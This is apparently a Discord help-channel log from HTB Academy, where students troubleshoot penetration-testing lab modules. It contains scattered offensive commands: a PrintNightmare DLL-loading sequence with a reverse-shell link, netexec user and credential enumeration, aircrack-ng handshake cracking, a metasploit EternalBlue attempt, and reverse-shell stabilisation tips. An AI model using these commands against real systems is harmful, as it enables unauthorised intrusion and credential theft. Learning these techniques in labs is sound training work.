#modules

No exam cant add material that wasnt in the course shit

bro is advertising

So its fine if I skipped the ASM module

Yep as it isnt part of the path.

When using impacket-smbserver to capture hashes, the credentials are only shown when the -debug flag is enabled. Without -debug, nothing is displayed. I’m using Impacket version 0.13.0.dev. Is it normal?

Yes, happened to me as well. The module and section is https://academy.hackthebox.com/module/116/section/1169, first question.

Hello folks

Quick question...does recurly accept virtual credits cards?

I'm using a card that's working on most platforms but not HTB 🙁

FIlter line by line, ok, but what am I searching? I dont understand that. Regarding the other question: I am connected to the target and I dont know how that helps me

i think it's good to get into AI hacking, we'll be reliant soon

can someone help me with tome connection issues? I cannot connect to deb.parot.sh. If i want to install nfs-kernel-server, i get a connection error "cannot initiate connection to deb.parot. same happens when i normally try to do sudo apt update

Tbh it’s not a good thing but what you say will or is somewhat true today. I am trying to understand all I can about it but not rely on it personally.

Like it’s cool to me if you already know your stuff but if you start from ai and try to proceed from there I don’t think that’s good. As a supplement to one’s own knowledge I think is better for an individual

While I agree with you, I don't think reliance is ever a good word.

Makes me think of having to rely on a car mechanic to get my car fixed when I can't fix something. It's great there are mechanics, but it comes at a cost.

AI Hacking is gonna be fundamental soon, u can trust me on this

people will wish trhey started learning earlier when ut was around

Sorry if I bother yoy guys, but I think this is the place to post. I follow the solution, but the RDP machine doesn't have this tool. And because the machine doesn't connect to internet, so I can't install it.
It's DNS Spoofing section, in Wi-Fi Evil Twin Attacks module.

Isn't it too early for a newbie (me) to do labs like this? I just can't understand how I was supposed to know which server is used for a service that requires a large amount of data.

Please, I know it's a stupid question but I need the answer...

Well Nmap with the -sV flag tries to ask every service for some information about what version it is running, if you know that you can run this command and use the information to see if the version is maybe old or has a vulnerability assigned to it. Its not so much about you knowing this all by yourself, but about you knowing how to tell nmap to give you info about the services running

everything you need to do for the lab is taught in the reading. It's not 'too early'

did anyone do the "Online PIN Brute-Forcing Using Reaver"? beacuse ive been staring at reaver now for 4hrs and no results.

How do i solve this question of SNMP footprinting module?

Any nudges?

did you enurate the target ? and if yes did you used any of the tools included to this section?

i am using snmpwalk

did you got an output?

got the email and custom version but not able to figure out this one

Got it thanks. Aborted it beforehand

no problem .

It didn’t take me that long for sure

Hey someone to help with WiFi password access

I'm having quite the struggle with Citrix Breakout I don't understand what I'm supposed to do I guess...? I don't understand how to get the windows session to begin with... Anyone have a second to lend a hand? Please @ with responses

[+] 0.00% complete
just getting this over and over

has anyone solved the ElasticNet Challenge for the AI Evasion - Sparsity attacks module. My L2 is off by 0.1 and I am having trouble finding the right tunes to get it down

Any tips for rdesktop or xfreerdp to increase response times? I have a module that I can not complete because of the response times. I have reset the box, and tried both rdp tools. It is not a connectivity issue from client-to-site VPN.

I just have my vm and pwnbox open, when one close i connect via the other... then u don't need to wait at all

@silk ore module is above tier 0; please don't share module content

you shouldn't have both vm and pwnbox running, they share an ip, thus causing ip conflicts

ok, sorry.
(but it was my powershell terminal output, not module content...¿)

I use my own box. It is a module where you connect via RDP to a target box, from there you enumerate the other boxes that are connected via the multi-homed target.

One htb module suggests these command line parameters for bad connections:

xfreerdp /u:Helen /p:'RedRiot88' /d:inlanefreight.local /v:10.129.229.244 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

Still module content, its content obtained from the module

Thank you!! I tried to exhaust all resources, including LLMs, before I ask questions here. I want to save questions for my peers, when I REALLY need help. This is such an occasion. Let me try this tweak.

A second reset of the target was the trick. I despise losing time. But, it is trials from which I learn the most.

I'm completing the Network Packet Analysis > Wireshark module.
One of the questions is What is the name of the screen section in Wireshark where we can view the payload information of captured packets in both ASCII and Hex format?

I've entered every version of Packet bytes, and Data bytes, including appending 'pane', changing case etc. no dice.

Any ideas where I'm going wrong?

Anyone give me a nudge on the first question in the "Credential Hunting" section of Windows Privilege Escalation?

Does anyone finish this question successfully? I tried multiple times with solutions but failed all the time

I get handshake then stop, and run ||sudo aircrack-ng /root/bettercap-wifi-handshakes.pcap -w /opt/rockyou.txt||

@tribal plinth Are you the author of Bettercap lab? 😄 Can I dm you?

Hey, i am on the using crackmapexec assessment and I am on the 3rd question i got James password and i have no clue, where to go, i tried looking through smb, ldap, winrm amd no results. I am sorta stuck right now, can someone dm if they can assist.

Did you check gmsa?

@visual crag #unverified-bot-commands message you're supposed to provide the output of the script after you get it

To anyone that has finished (or almost finished) in the AI Red Teamer job role path, I was wondering whether the "skills assessments" on some of the modules (particularly the hard ones like AI Evasion) there is good enough to be put in a resume looking for an internship / junior (security or not) AI/ML roles? Or are they too basic

-# provided that I know its still guided, but I was just wondering

Got it !!! Thank you guess i was doing it wrong lol

Hello, I need some help with the Attacking Authentication Mechanisms Skills Assessment:|| I tried to inject a new JWK with the python script and I'm not being able, I tried other tools such as jwt_tool but unsuccesful||. Could someone please give me a hint? Thanks!

In SQLMap Essentials module Skills Assessment, what's the difference between using {"id":1}, {"id":1*}, and {"id":*} in the HTTP request file?

can someone help me in the login brute forcing module, I am stuck in the custom wordlist section

i dont know what user name we need to login with

can someone help me with that

Does anybody know what could be the problem here?

Command:
proxychains netexec smb TARGET_IP -u 'USER' -p 'PASSWORD' -d DOMAIN -M spooler

RESULT:
Spooler service enabled

Command:
proxychains rpcdump.py @TARGET_IP | egrep 'MS-RPRN|MS-PAR'

RESULT:
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

Command:
proxychains nxc smb TARGET_IP -u 'USER' -p 'PASSWORD' -d DOMAIN -M printnightmare

RESULT:
Vulnerable, next step https://github.com/ly4k/PrintNightmare

Command:
proxychains ./printnightmare.py -check USER:'PASSWORD'@TARGET_IP

RESULT:
[*] Target appears to be vulnerable!

Command:
proxychains ./printnightmare.py -dll '\IP_OF_WIN_HOST\smb\test.dll' -name 'My Printer Driver' USER:'PASSWORD'@TARGET_IP

RESULT:
[] Enumerating printer drivers
[] Driver name: 'My Printer Driver'
[] Driver path: 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ec1e73781eaf7fda\Amd64\UNIDRV.DLL'
[] DLL path: '\\IP_OF_WIN_HOST\smb\test.dll'
[*] Copying over DLL
Traceback (most recent call last):
<SNIP>
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

test.dll
-> https://notes.justin-p.me/guides/printnightmare/#custom-simple-c-reverse-shell-example

I need a nudge for Whitelist Filters . I can upload the payload but when I execute them its 404. I tried various file patterns, non is working so far.

solution is not working also.

Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.

I get that, tbh they should be in the solution.

I think some solutions are outdated and need to be updated.

Hello

If I am using NXC to spray should I use the LDAP protocol or SMB ?

I'm only having warning and error or bad magic number while running the script.

why not both?

Hey bro can I use NXC instead of kerbrute for username discovery ? Do u know the command

nxc smb 172.16.5.5 --users | cut -d '\' -f2 | cut -d ' ' -f1 > valid_users.txt

Can someone help me understand why, in an HTB lab machine, the port always changes to filtered after a few minutes?
At first, the port looks normal and shows as open, but after a short time it switches to filtered. I’ve tried many times, but once this happens I can’t do anything. Module Pivoting, Tunneling, and Port Forwarding at Remote/Reverse Port Forwarding with SSH section.

So if I understand your issue correctly, you are setting up a dynamic port forward to run nmap against internal hosts and initially the results come back with open ports, but on follow on nmap scans come back filtered?

which lab is this?

Yes, at first everything was normal, but then I noticed that SSH and RDP were hanging. So I tried running an Nmap scan again, and this time the result showed the ports as filtered. That is probably the cause.

You can DM what you have setup if it is still an issue.

nxc smb 10.129.137.178 -u '' -p '' --users --users-export $(pwd)/users.txt

Hello, I need some help with the Attacking Authentication Mechanisms Skills Assessment:|| I tried to inject a new JWK with the python script and adding the line expç and I'm not being able, I tried other tools such as jwt_tool but unsuccesful||
. Could someone please give me a hint? Thanks!

help with "Open VPN" I can't connect

Which OS do you use?

┌──(kali㉿Bob)-[~]
└─$ ping -c 5 10.129.236.99 
PING 10.129.236.99 (10.129.236.99) 56(84) bytes of data.

--- 10.129.236.99 ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4099ms

kali

I tried to many Targets and downloads to many vpns and still no connection

I don’t understand why it doesn’t work there is the completed initialization sequence so it should work .... , look :

https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

Thank you !

Module: ADCS Attacks
Section: Using BloodHound with Certipy
Question: Certipy doesn't have the -bloodhound flag, and it no longer exports a bloodhound .zip data from what I remember, is using certipy with bloodhound still being updated or is that feature deprecated?

Module: ADCS Attacks
Section: Skills Assessment
Question: Compromise DC01 and submit the value of the flag file at C:\Users\Administrator\Desktop\flag.txt

The user I found that starts with j is part of a group called src_management, which has ManageCertificates rights.
Though when I try to issue the certificate with certipy, it gives me access denied.

Isn’t that supposed to happen?

Or you mean denied in a way you don’t even get the key save option

it's deprecated I believe. they changed a lot with the new version of bloodhound too

wdym supposed to happen?
I'm supposed to be able to issue the certificate, right?

The request is pending.

The issue is I get access denied when trying to approve it

which is supposed to work according to what I understood from ESC7 section.

Thanks.

Dm which template ur going for

are they allowed to post the template here ?

Hi, I'm stuck on question 3 of the NTLM Relay "skill Assessment". Any hint?, I've gained administrator access to backup01$ but I don't know how to proceed.

Enumerate

anyone experiencing issues with htb academy machines ??

Hey All,
I'm doing the CPTS path, Pivoting, Tunneling, and Port Forwarding module, at the RDP and SOCKS Tunneling with SocksOverRDP section. When I do the following command on the first host" regsvr32.exe SocksOverRDP-Plugin.dll I am getting an error instead of the success msg. I am following the exact instructions from the module so Idk what to do.

Am I just better off perfecting Chisel and Ligolo and using only both in the exam? These tools seem really meh tbh

Not sure, but I think defender quarantines the file if I recall correctly.

You have to disable defender OR allow the file.

Something appears to be wrong with the ACADEMY-INCIDENT-HIVE.

can I submit a ticket for my issue ?

does any1 know the quality of the academy solutions?

is it just an answer or is it a full on walkthrough with explanations, etc. Thinking about buying a subscription but want to be sure

Guys in the pivoting module, is this correct ? proxychains works with TCP packets (layer 4) but nmap -sn sends ICMP packets (layer 3) which proxychains doesn't understand. Am i missing something ?

MadhukarRaina doesn't seem to be on discord

Did you complete module 148 @supple gorge

any help with this ???? :

can you rdp to it? not all targets respond to pings

oh yes I can

that's weird

thank youu ❤️

if it's a windows target: windows (generally) doesn't respond to ICMP Echo requests

I see , something to add to my knowledge !! thank you

dm if you still need help

hey can I ask you something please

about?

aaaaa

you are not going to be angry?

it is about osTicket

in the help center they say the credentials in the section but I can't find it

oh shit... what is that

scary

One day I'll change that HAHAHAHA

read the provided sample output of a tool

it's provided, maybe not directly as user:pass

but it IS provided

oh thanks

can I ask a other question 🥺

like I used all the passwords

also they said that the password from the tool are not going to work

did you use all the username and password combinations for logging in? :)

also there's a specific login page (for employees)

sorry my english is not good but I think it mean

this is not real

that tripped me up too, but they are legit

I used the email they say use email in the help center

they just mean that the sample data isn't out there in the real world

like is it kevin right?

his email

i don't recall fully

all i will tell you is try everything

there is a limit that is annoying

just log in via the web portal... not sure what you mean by limit

what is web portal?

a web portal being how you interact with the service, via the web

please Marcielee my wisdom tooth is growing that hurt!!!!

I am trying

there is a limit

"message": "Maximum failed login attempts reached",

that sounds like you're using a fuzzing tool

and NOT the web portal

no

not using fuzzing

anyway visit the login page; use the credentials

I am in the normal agent login

if it limits you then reset the lab

change the ip in your hosts file

and retry

^

finally

now just to root around and see what you can find :)

I can just find your mom, they said there is somthing else

I don't mean your mom

I mean the ticket

name

sorry

I think there is a way to see the old tickets

there is, now go

utilize your brain (and google) to see if you can't figure out how to search up tickets

I found it

that makes me want to buy Dehashed

it will ultimately be irrelevant for the exam, paid tools aren't required

hmmm

maybe I need it for something else then

sorry HTB

but I can't promise you I will that I will use my power for the good things

don't imply doing illegal things if you wish to remain in the server :)

Being in prison isn't exactly relaxing. If you want to avoid that...

hey I was just joking!

sorry

rule 1 of gun safety; treat every gun as if its loaded

I did not understand the connection

like

I am not a gun

we have no way of knowing if you're serious or not

it's also called an analogy

if you're unable to abstract analogies then idk what to tell you

sorry

I will try my best

Anything you write anywhere on the internet can be found and used by authorities...

even here?

oh shit

am I targted now?

I should said that from my Raspberry PI!!!!!

it is easier to destroy

Discord definitely keeps logs of activities.

so that will be aginst me ?

I don't want my mom to see in in the TV as a bad person

🙁

My tip: never talk about any illegal activities you are planning. Whether it's because you want to carry them out or even if they are meant as a joke.

okay can I ask you something please?

is there people who knows about my things I put in the cloud?

like if I put something in google drive

can they see it?

Basically, yes.
The cloud is just someone else's computer.

OOHHH SHIHIHITTTTT

IM COOOCKCKEDDD

but how I am not in the jail right now

privacy policy most likely

cloud providers like backblaze cant just look at your files without cause

OSINT Corporate Recon the cloud storage part im sorta stuck.

the question askes: Investigate the website and find the bucket name of AWS that the company used and submit it as the answer. (Format: sub.domain.tld)

im assuming its talking about inlanefreight.com. so started looking at the source code for exposed buckets, but i cant find anything at all. searchcode which is used lots in this module is no longer a functioning website. i guess they are rebooting searchcode but in the meantime is there an alternative?

but any pointers? i even ran it through spiderfoot to see and only thing i can find that would point me in the right direction is the PDF download file, but that file is just in the wordpress uploads dir

anyone?

You looked in the right place. You just overlooked it. And no, I don't mean the PDF.

aaaa

I am doing CTF but my laptop is shit and I need to crack a hash

I am still not able

What CTF?

it as a free CTF on some platform and it is okay to give that

because there is already writeups for it

I don't know dude

Which one?

it is on THM

Then go ask for help in THM

This is for HTB Academy modules

I see people asking for help in general

this ain't THM bro... we can't help you with anything outside HTB platform

dude this is THM -_-

This server is HTB bro... look closer

I can give you the CTF and you will find the same hash

oh

Gotcha, thanks for the heads up

you should still be able to crack a hash on a ctf using your laptop

if you are doing a CTF that is not hack the box most of the time the hashes are in popular wordlists, try weakpass4 or rockyou or seclists

unless your bruteforceing

and yeah this is hack the box not try hack me dude lol

I am on the last question of using crackmap exec skill assessment i got the .ccache I have exported however i can’t dump shares, i can’t dump users or anything. I tried using secret dump.py to get an administrator hash however no dice sorta confused

What’s the error

Well lately it is asking for a password which it shouldn’t do other times it asks for the use-vss and when i use the vss parma it is blocked or it will say try just-dc-user and that didn’t get anything it will also say socket error or time out

Can u dm the command too

Yea

what am I suppose to do??

https://academy.hackthebox.com/module/33/section/183

is there a flag that doesnt mind http

read and understand the error, now read and understand the manual for the command

Stuck on Abusing HTTP Misconfigurations - Hard assessment.
Successfully poisoned the cache (||parameter ||||cloaking||) for the exact admin-monitored URL in the red note ("please access this site frequently via this link").
Payload breaks out cleanly and executes instantly on clean URL load (cache HIT).
Tried XHR (with/without custom headers), fetch, and even location redirect – all fire in my session, but nothing happens backend-side despite the note saying admins monitor frequently.
Waited way past TTL, multiple lab resets, careful timing – no change.
Is the admin bot currently broken/not triggering?

I noted down “ensure we close first script tag so the undefined function doesnt ruin everything” for this one, did you check that?

Module: Active Directory Trust Attacks
Section: Mapping Active Directory Trusts

When I try to launch Adalanche with .\Adalanche.exe analyze it gives me an access denied error

Problem launching webservice listener: listen tcp 127.0.0.1:8080: bind: An attempt was made to access a socket in a way forbidden by its access permissions.

The exercise is optional so for now I just typed DONE and will move on.
But this probably should get fixed.

• AI Defense
• Skills Assessment
• Struggle getting tokens
• I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand? Please mention so I get the notification, thanks in advance 🙂

Hello! Does anyone finish the module Introduction to NoSQL injection? I'm trying to solve the skills assessment II and I need a hint! thanks in advance

Bump

is there anyone online that is fairly knowledgeable about how the HTB vpn works? I cant access my homelab network (192.168.10.0/24) after establishing a vpn connection

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

I can connect to the vpn and it works fine. I just cant use any of my local resources while on the vpn

You just have to use the tun0 interface.

it seems all the traffic is using the tun0 interface, is it not setup to be a split tunnel?

Check your .ovpn config file.

ah it has the redirect-gateway to force all traffic to the tun0 interface

Could I get a nudge on the LFI Skills Assessment?
||Found what could be the vulnerable parameter, however, it spits out verbatim my input without executing anything. Fuzzing/dirbusting doesnt find anymore directories or parameters to mess with.
Tried tampering with some things in the request with burp but not getting anything back
I see I can upload a file as docx but not seeing a way to access it. Also no PHPSESSID cookie||

dm me

Thanks – yes, I closed the original script tag with </script>, and the injected <script> runs perfectly (XHR fires on cache HIT, no errors).
Payload is clean, poison sticks for the monitored URL, everything executes when I load it.
But no promotion happens even after resets and long waits.
I think the admin bot is bugged/not triggering right now.
I'm hoping that someone from support can check/fix it?

If you want you can dm me your solution and I compare it to what I’ve written down

yo guys im on attacking joomla in application attacks

i got RCE and got the flag, but question says incorrect

well, i was missing a ! character at the end of the flag

For the record, HTTP Misconfigurations - Skills Assessment - Hard cannot currently be solved until the admin bot has been fixed. I verified that my solution should work. Hopefully someone can take a look at this soon.

Anyone seen this? I've tried a few times and get the same thing each time. I get my shell with netcat and then improve by spawning the python shell, and then every keystroke is doubled:

It still works like there's only one keystroke, but it's doubled to the screen.

Maybe I'll try respawning the target.

Do ctrl + z to pause the process (Reverse shell) and type
stty raw -echo ; fg

It worked for me when this append

btw you should always do this to get a stable reverse shell and have history etc..

Awesome, thank you!

does anyone know if the oracle TNS module within footprinting is wrong or can someone help me set up ODAT for the life of me i cannot get this flag because the odat is not working properly and i need it to get the flag

nooo guys don’t all help at once noo pls one at a time

but pretty much the main issue im having is i am running kali and odat.py needs python 3.11 but im running a newer version of python i think command i am trying to run is ./odat.py all -s <target_ip> but i keep getting a fat error message even tho i have gone on the odat github and followed the steps to install it! so annoying when you get stuck like this because it just becomes so unmotivating

Anyone got problem connection with RDP? Using Pwnbox .

There are a couple of tips for RDP in this help article that have helped others in the past: https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_480d492483

Weird, worked like a charm few hours ago ;p

What's the problem in specific? Just.. can't connect?

Getting no screen at all, it ask for password - enter it .. Keep loading then shuts down.

Sorry to ask, but have you tried resetting the target?

Twice 🙂

@ocean night well, used same syntax worked now lol

dafuq

Uhhh.. Gremlins?

Damn thats old! Must be ^^

Looking for some help on the File Upload attacks: Type filters module. For the exercise I found an extension that uploads my php shell successfully as file.<extension>.jpg but when I navigate to that file in that browser I see the error: The image at url/profile_images/shell.<extension>.jpg cannot be displayed because it contains errors. Any ideas how to debug from here? I thought I had already got past all the file type filters.

1. Type filters deals with the 'Content-Type' header
2. Sometimes things break in payloads

On pass the ticket for linux i am unable to crack svc aes 256 hash

A single extra space at the start of the flag was the issue.

Hi everyone, first time trying to run kali Linux in a virtual box. Trying to download and run the VPN in the academy but my terminal basically just freezes up.

Kinda stuck on what to do, I would like to run the academy stuff on my own machine

If your window has the last lines 'Timers: xxx ' and 'Protocol options: xxx' then it's up and running, just start a new terminal tab as your vpn is connected.

2025-12-30 00:19:16 tun/tap device [tun0] opened
2025-12-30 00:19:16 net_iface_mtu_set: mtu 1500 for tun0
2025-12-30 00:19:16 net_iface_up: set tun0 up
2025-12-30 00:19:16 net_addr_v4_add: 10.10.14.73/23 dev tun0
2025-12-30 00:19:16 net_iface_mtu_set: mtu 1500 for tun0
2025-12-30 00:19:16 net_iface_up: set tun0 up
2025-12-30 00:19:16 net_addr_v6_add: dead:beef:2::1047/64 dev tun0
2025-12-30 00:19:16 net_route_v4_add: 10.10.10.0/23 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:19:16 net_route_v4_add: 10.129.0.0/16 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:19:16 add_route_ipv6(dead:beef::/64 -> dead:beef:2::1 metric -1) dev tun0
2025-12-30 00:19:16 net_route_v6_add: dead:beef::/64 via :: dev tun0 table 0 metric -1
2025-12-30 00:19:16 Initialization Sequence Completed
2025-12-30 00:19:16 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 44, compression: 'lzo'
2025-12-30 00:19:16 Timers: ping 10, ping-restart 120
2025-12-30 00:19:16 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt
^C2025-12-30 00:41:06 event_wait : Interrupted system call (fd=-1,code=4)
2025-12-30 00:41:06 SIGTERM received, sending exit notification to peer
2025-12-30 00:41:06 SENT CONTROL [us-academy-6]: 'EXIT' (status=1)
2025-12-30 00:41:07 net_route_v4_del: 10.10.10.0/23 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:41:07 net_route_v4_del: 10.129.0.0/16 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:41:07 delete_route_ipv6(dead:beef::/64)
2025-12-30 00:41:07 net_route_v6_del: dead:beef::/64 via :: dev tun0 table 0 metric -1
2025-12-30 00:41:07 Closing tun/tap interface
2025-12-30 00:41:07 net_addr_v4_del: 10.10.14.73 dev tun0
2025-12-30 00:41:07 net_addr_v6_del: dead:beef:2::1047/64 dev tun0
2025-12-30 00:41:07 SIGTERM[soft,exit-with-notification] received, process exiting

This is part of the code the terminal spat out to me

I accidently ended it but I did not see the timers

Exactly what blueasagi said.. your VPN connection was running, you just leave that tab open and use new tabs or whatever you need to interact with the targets.

don't worry about the 'timers'

2025-12-30 00:19:16 Initialization Sequence Completed

It gives me these warnings at the top, not sure if it matters but not sure how to disable them either.

2025-12-30 00:19:14 DEPRECATED OPTION: --persist-key option ignored. Keys are now always persisted across restarts.
2025-12-30 00:19:14 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Compression support is deprecated and we recommend to disable it completely.
2025-12-30 00:19:14 Note: --data-ciphers-fallback with cipher 'AES-128-CBC' disables data channel offload.
2025-12-30 00:19:14 OpenVPN 2.7_rc4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-12-30 00:19:14 library versions: OpenSSL 3.5.4 30 Sep 2025, LZO 2.10

those warnings are irrelevant

the only major important line is

Initialization Sequence Completed

after that you just open a new terminal and you should be good to go

Oh okay, thank you, then I should be getting the SSH login information from the bottom from the hack the box site correct?

from the question section, yes

Okay, I will try again, thank you

Just like my typing speed compared to MarcieLee

but that depends; not all modules will have you ssh in, some may require you to discover credentials (but that's all contextual from the reading)

or sometimes the credentials are in the reading, but not referenced in the question as a step-in

Understood, however I am now having an issue were I think I am putting the correct password below but maybe I did not format it correctly

ssh 10.129.187.55
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
kali@10.129.187.55's password:
Permission denied, please try again.

I attempted to follow it and use the provided password but maybe I am doing it wrong, made sure my caps lock was off and took my time

this isn't a relevant error

copy/paste the password

ctrl+shift+v to paste in terminal

No I know what I did wrong now!

It was a silly mistake, I did not put the htb-student@ first

before the IP

i'm telling you for the future that it's best to use copy/paste instead of manual typing

it reduces the amount of human error :)

Understood, thank you for that

likewise ctrl+shift+c allows copying from the terminal

Using the stack

Hello. I'm going through the "Android Application Static Analysis" module a.t.m. and I'm stuck on the "Reversing Hybrid Apps" section. After decompiling the app, I found the debug key needed to authenticate with the remote server, however for some reason my requests keep returning "Invalid credentials!". Not sure what I'm doing wrong. Anyone that wants to give me a nudge? I'll send you the request I'm using via pm.

Hi, I'm on the course
Documentation & Reporting Practice Lab. I'm almost done, I'm on the AD machine. I got the first three questions right, but I can't figure out the fourth one. Here's the question: What powerful local group does this user belong to?

I looked in the JSON files and found some interesting things, but it's not working.

Can anyone help me?
I'm French and my English isn't very good.

hey i almost forgot this section cause I've done it a long time ago, but your solution could be as simple as for example looking through the bloodhound graph, or maybe use bloodyAD, nxc, ldapsearch, windapsearch, to look for your user's group, if you struggel to craft a command, let AI help you, claude will do the job

Nice ty

ofc

Can i DM you . I also stuck at Question3 of crackmapexec assessment.

Sure, you can DM.

Could anyone help me with contacting the HTB support? Idk if here is the right place to ask, but I need it.

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Anyone was able to complete the "Rogue Actions" module from "Attacking AI - Application and System"?

TY!

shells & Payloads module -> Infiltrating Windows, the module is pretty straight forward, exploiting EternetBlue vulnerability, the question i am stuck is this one
"Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:"
i confirmed it's vulnerable to EternelBlue, but when i actually try it with metasploit module "exploit(windows/smb/ms17_010_psexec"
i am getting this error shown in the picture, i am pretty sure everything should be okay, i tried different modules, and payloads but none worked, it would be great if any one give me a little nudge on this

Information Gathering - Web Edition Web Archives According to wikipedia.com snapshot taken on February 9, 2003, how many articles were they already working on in the English version? Answer with the number they state without any commas, e.g., 100000, not 100,000.
The Wayback Machine Work do not work , so i can t get the right number , can anyone help me?

The only thing I see is the use of port 443 that needs root privilege and may cause an error if metasploit is not ran as root

tried it with root, unfortunately same error

And other port ?

Above 1024

yeah, same stuff

it looks like it is error from my set up because i didn't see any one in the forums having this issue

it is working just fine with pwnbox

If you use your own VM try to open port for reverse shell in your firewall

my VM does not have any firewall

Have you tried a bind payload? You can DM your options if you'd like too.

i tried reverse_tcp with pwnbox and it worked just fine, now i am sure that my set up is issue here, but thank you

maybe try sudo ufw disable

before running msfconsole

Introduction To Windbg > SA Q.1 (Tracefile Unqualified Symbol)

temp-fix: open the trace file on a local machine that has internet access

When I open the trace file and run dt ntdll!_PEB I or dt ntdll!_EPROCESS I get the following error. I tried using .symfix C:\Symbols to fix this error but it didn't work. I then used a local Windows machine, installed Windbg, and used that, given the local machine had internet access, it fixed the issue.

dt nt!_EPROCESS ************************************************************************* *** *** *** *** *** Either you specified an unqualified symbol, or your debugger *** *** doesn't have full symbol information. Unqualified symbol *** *** resolution is turned off by default. Please either specify a *** *** fully qualified symbol module!symbolname, or enable resolution *** *** of unqualified symbols by typing ".symopt- 100". Note that *** *** enabling unqualified symbol resolution with network symbol *** *** server shares in the symbol path may cause the debugger to *** *** appear to hang for long periods of time when an incorrect *** *** symbol name is typed or the network symbol server is down. *** *** *** *** For some commands to work properly, your symbol path *** *** must point to .pdb files that have full type information. *** *** *** *** Certain .pdb files (such as the public OS symbols) do not *** *** contain the required information. Contact the group that *** *** provided you with these symbols if you need this command to *** *** work. *** *** *** *** Type referenced: nt!_EPROCESS *** *** *** ************************************************************************* Symbol nt!_EPROCESS not found.

On local machine

<SNIP>
Loading Dump File [C:\Users\P1erce\LegitProgram01\LegitProgram01.run]
0:000> dt _PEB
ntdll!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
<SNIP>

Has anyone completed the Wi-Fi Penetration Testing Tools and Techniques module? The target machines seem to be missing APs that are mentioned in the questions

hii

anybody completed these??

That is the Linux basics part?

me

yeaah

oh great actually is it of any use like just keeping on going without actually using it with any real time projects

because its too much of information

most arent needed for the actual cybersecuirity ig

any issue with this module? "Pivoting, Tunneling, and Port Forwarding
RDP and SOCKS Tunneling with SocksOverRDP"

did everything accordingly still cant connect to the second machine(the one with the flag)

a solid understanding of the basics of linux will carry you far

regex is super useful for refining searches

i.e. grep -e "^hello", grep -e "hello$", and grep -e "hello" all search differently

what do you want to know?

you should stop watching Real Madrid

Check again ur proxifier

Modern Web Exploitation Techniques Skill Assessment

the pass the cert section on password attacks seems kinda complicated to understand as compared to ptt and pth

Really 🤨. What makes you say that

If u want to see if you're learning try overthewire bandit challenges. Trust me you'll be amazed at how many challenges u can solve given u understood the contents on academy

same errorrrrr pls help mee lel

.

spent three hours on this..

https://tenor.com/view/roll-over-gif-5721510543785152669

I'm assuming your hosts file is updated.

yes sir

ah i might have made a small error

You can send me a DM.

i misspelled inlanefreight in etc hosts

Good deal, so you got it to work? I'm going to delete the screenshot just because of the spoiling content above Tier 0.

yeah thx a lot just submitted both flags

I am always messing up the inlanefreight spelling by putting the 'i' first instead of the 'e'

It happens. Glad you got it sorted out.

You just need to send the key to the login endpoint:
curl -X POST "http://[...]:[...]/login" -d "temp_debugging_key=[...]"

I stepped away to work on other projects for a bit is it possible to reset a module I am in the middle of or completed awhile ago?

no

is it possible to do password attacks skills assessment without knowing about pivoting ?

I believe in the scenario portion of the new SA it covers a technique that can be used to pivot and complete the assessment. If you have a few minutes to learn something new, you could also use other tools, like ligolo to perform the pivoting portion.

I'd have to double check but as I recall the first step after foothold is a pivot/lateral movement to an internal system

yeah I will have to refer to some writeup for this one

No writeup required

Also its above tier 0. So writeups are prohibited

hm I saw one on medium

Difficulty isnt a reflection of tier

i mean medium.com

Unless you mean medium.com

I am redoing some old exercises from the modules I finished long ago. Is it normal not to be able to connect to the target machine anymore after the module is complete?

Its still prohibited and against ToS

Everything required to complete the module is provided in the module

At least info-wise

Anyone finish EAP Downgrade Attack (Attacking) question? I need help

hey, for the windows prpvilege escalation under the lviing off the land binaries and scripts. can someone nudge me in the right direction? i tried the approach given in the module but i failed to do so.

sing the techniques in this section, find the cleartext password for an account on the target host.

hi guys, i need a bit of help on Intro To Assembly Language. The question is Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?

when i download the gdb file, i run it with the script they gave and then inside of GEF i run starti (i couldnt find _start and chatgpt said to try this instead)

i get the following output:
0x7ffff7fe4b20 <_start+0000> mov rdi, rsp
0x7ffff7fe4b23 <_start+0003> call 0x7ffff7fe5720 <_dl_start>
0x7ffff7fe4b28 <_dl_start_user+0000> mov r12, rax
0x7ffff7fe4b2b <_dl_start_user+0003> mov rdx, QWORD PTR [rsp]
0x7ffff7fe4b2f <_dl_start_user+0007> mov rsi, rdx
0x7ffff7fe4b32 <_dl_start_user+000a> mov r13, rsp

i dont see _start+16 anywhere, and i'm a bit lost

then afterwards, the file also deletes itself

not sure if im supposed to put the gdb file itself in a debugger, or im supposed to be in another file?

nvm could answer it if i dont use the htb provided script with gef..

Thanks. I just blindly followed the example explanation and sent the key via the URL.
